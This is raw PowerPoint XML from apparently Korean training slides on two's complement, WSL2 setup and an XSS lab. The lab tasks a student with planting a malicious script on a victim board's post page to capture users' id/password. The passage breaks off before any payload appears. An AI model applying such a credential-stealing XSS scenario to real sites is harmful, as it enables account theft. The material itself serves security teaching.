              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 추가하면 된다</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C2104A4-D2CA-4F17-99E5-3BBEFD1B38C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4068727" y="1662011"/>
            <a:ext cx="3544186" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>각 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>자리수에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 대한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가치</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25745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animBg="1"/>
      <p:bldP spid="3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a:t>2025, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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1982716-9971-4DF9-9E7C-54DEB4D66C97}"/>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(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>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E5B4BAE3-40C9-4846-B7F8-9666CFA1A6CF}"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>000 0000 0000 0000 0000 0000 0010 1011(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42F7DA70-2E62-4879-A1EA-DA708E1AA5E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261731" y="3245154"/>
            <a:ext cx="9179442" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t>- 43 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>??????????????????????????????????????????</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t>(2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C426D79A-3192-4FC3-A564-04F86F6FF879}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2523460" y="4538010"/>
            <a:ext cx="6487633" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>음수를 표현하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>를 만들어보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55716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a:t> File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The Tree Structure of the Filesystem (Unix Power Tools, 3rd ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624632DA-2FED-4F7F-85F1-88AE9DB0A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539" y="1870982"/>
            <a:ext cx="5756440" cy="401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883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 action="ppaction://noaction"/>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2846182976"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3290207" y="2813240"/>
          <a:ext cx="4612822" cy="221678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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>WSL2(command)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r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>명령어</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32692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1"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16208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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat"/>
              </a:rPr>
              <a:t>보고서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat"/>
              </a:rPr>
              <a:t>(Deloitte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat"/>
              </a:rPr>
              <a:t>Asia-Pacific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat"/>
              </a:rPr>
              <a:t>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may take a few minutes…”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dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 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dirty="0"/>
              <a:t>다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“exit”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/Environ/WSL2(command)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> WSL2 command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>설치</a:t>
            </a:r>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742CF30C-F93B-4682-BAAB-B954723A9E9E}"/>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TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BAAA65A-71A5-4780-BF01-B99D6B8C9C7B}"/>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50" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>윈도우 터미널에 아래 명령어를 순서대로 입력해주세요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>.</a:t>
            </a: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featurename:Microsoft-Windows-Subsystem-Linux</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featurename:VirtualMachinePlatform</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3. 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번 작업이 완료되었다면 설정을 적용하기 위해 컴퓨터를 재부팅 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="그림 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2EC6FA7-4498-4570-9B21-75490F642E1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1724680" y="2334397"/>
            <a:ext cx="2574664" cy="2735580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="그림 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF4653D5-2E18-4895-9B26-24D34689A3E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6776915" y="3198113"/>
            <a:ext cx="4816822" cy="2373820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="직사각형 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{692609C5-9B2A-43F5-B84C-1C472EA3B1DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6776914" y="3746501"/>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F5615FE-16A6-4D74-9CF8-10323D928F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6776914" y="4553212"/>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26355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cyber_environment.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 파일을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>열어서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>모든 내용을 복사한다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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번 작업을 통해 관리자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>CMD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 켜서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번의 내용을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>붙혀넣는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>시간 다소 소요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>6.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설정이 완료되면 이 창을 닫고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Downloads/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>cyber_homework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/Terminal/WindowsTerminal.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 찾는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>관리자 권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>WindowsTerminal.exe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상단의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>아래화살표</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>표시 를 눌러</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>우분투를 선택한다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4AAD2511-9613-4BCC-8F3E-90550F86C777}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="524256" y="771503"/>
            <a:ext cx="5240817" cy="1851681"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="그림 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89A5ABF6-39CF-4279-BAAA-6AA337B56D83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="524256" y="3950829"/>
            <a:ext cx="5314359" cy="1210523"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="직사각형 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B377DF6-33F2-48FC-8B86-49AD975E5C22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1610782" y="4387238"/>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DE02D0-5512-4A78-8AED-0872D678CD3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6334046" y="1460341"/>
            <a:ext cx="5314359" cy="1483632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="직선 화살표 연결선 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6C11DB7-E081-482A-A3FA-43A37B91764E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6851599" y="1627632"/>
            <a:ext cx="902513" cy="1548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1682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/Training/Unit/Web/8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 8. XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>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공격자는 현재 피해 웹서버의 로그인 페이지소스를 얻고</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게시글 페이지에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취약성을 알아내었다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이때 피해서버에 게시글에 접근하는 사용자들의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>id/password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>를 얻을 수 있는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실행하고</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실행에 쓰인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>의 정확한 파일의 경로와 이름</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게시글의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>을 입력하시오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공격에 필요한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>들 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: /var/www/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>파일</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게시글 생성 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test01 /test01</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악성 스크립트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
